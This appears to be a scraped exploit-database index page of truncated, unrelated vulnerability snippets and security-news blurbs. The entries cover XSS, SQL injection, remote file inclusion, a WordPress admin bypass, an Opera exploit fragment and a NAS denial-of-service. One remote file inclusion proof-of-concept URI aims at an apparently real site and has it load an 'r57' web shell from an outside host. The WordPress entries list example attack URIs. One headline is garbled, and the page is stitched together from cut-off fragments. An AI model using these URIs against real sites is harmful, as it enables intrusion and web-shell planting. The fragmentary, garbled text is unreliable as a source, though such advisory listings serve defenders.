A Close Look at an Exploit Pack
If you happen to stumble upon a Web site that freaks out your anti-virus program, chances are good that the page you’ve visited is part of a malicious or hacked site that has been outfitted with what’s known as an “exploit pack.” Read the full article. KrebsonSecurity...
DigitalHive - 'mt' Cross-Site Scripting
source: https://www.securityfocus.com/bid/37697/info DigitalHive is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context o...
Java vulnerabilities just to be on the attack code then we to-vulnerability warning-the black bar safety net
If you use the Java virtual machine and have not yet installed Sun's latest security update for Mac OS X, Windows, or Linux, now is the time to make up for it. On Thursday, local time, a security researcher released a derived from the Mac OS X Java Runtime Environment vulnerability...
Joomla! Component com_mygallery - 'cid' SQL Injection
Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla com_mygallery 0 The 'com_mygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied...
Joomla! 'com_mygallery' Component 'cid' Parameter SQL Injection Vulnerability
No description provided by source. Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla com_mygallery 0 The 'com_mygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to...
Article Directory Index.PHP Remote File Include Vulnerability
No description provided by source. An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/index.php?page=http://www.example2.com/r57.txt? http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirotr0x/r57.txt?...
Article Directory Index.PHP Remote File Include Vulnerability
Article Directory Index.PHP Remote File Include Vulnerability. Webapps exploit for php platform An attacker can exploit this issue via a browser. The following proof-of-concept URI is available:...
Article Directory Index.PHP Remote File Include Vulnerability
Exploit for unknown platform in category web applications. Article Directory Index.PHP Remote File Include Vulnerability. An attacker can exploit this issue via a browser. The...
WordPress 2.0 2.7.1 - admin.php Module Configuration Security Bypass
WordPress 2.0 2.7.1 - admin.php Module Configuration Security Bypass An attacker can exploit this issue via a browser. The following example URIs are available: http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt...
WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass
Exploit for unknown platform in category web applications. WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability...
WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass
An attacker can exploit this issue via a browser. The following example URIs are available: http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt...
Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/42327/info Wowd search client is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting use...
Researcher Publishes Valid Wildcard SSL Certificate
In the wake of Moxie Marlinspike’s SSL talk at Black Hat this summer, another security researcher has used the technique described in the talk to create and publish a valid wildcard certificate and private key that could be used to fool browsers into believing a site is legitimate when it is in...
Match Agency BiZ - 'report.php?pid' Cross-Site Scripting
source: https://www.securityfocus.com/bid/42976/info Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser o...
Opera 9 Configuration Overwrite
Opera web browser in versions HttpClients::OPERA, :uamaxver = "9.10", :osname = OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX , :javascript = true, :rank = ExcellentRanking, reliable cmd exec, cleans up after itself :vulntest = nil, def initializeinfo = superupdateinfoinfo,...
x10 MP3 Automatic Search Engine 1.6.5b - video_listing.php?key Cross-Site Scripting
x10 MP3 Automatic Search Engine 1.6.5b - video_listing.php?key Cross-Site Scripting source: https://www.securityfocus.com/bid/43336/info x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An...
HotScripts Type PHP Clone Script - index.php?msg Cross-Site Scripting
HotScripts Type PHP Clone Script - index.php?msg Cross-Site Scripting source: https://www.securityfocus.com/bid/43519/info Hotscripts Type PHP Clone Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may...
68 Classifieds 4.1 - login.php Cross-Site Scripting
68 Classifieds 4.1 - login.php Cross-Site Scripting source: https://www.securityfocus.com/bid/36208/info '68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary...
NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)
NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1) source: https://www.securityfocus.com/bid/35893/info NTSOFT BBS E-Market Professional is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An...
Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
Remote: Yes Local: No Credit: Mike Cyr, aka h00die Vulnerable: NASU2FW41 Loader 1.17 Not Vulnerable: Discussion: Addonics NAS Adapter Post-Auth DoS Addonics NAS Adapter is prone to several post authentication buffer overflows. Each of these buffer overflows will crash the entire TCP/IP stack and...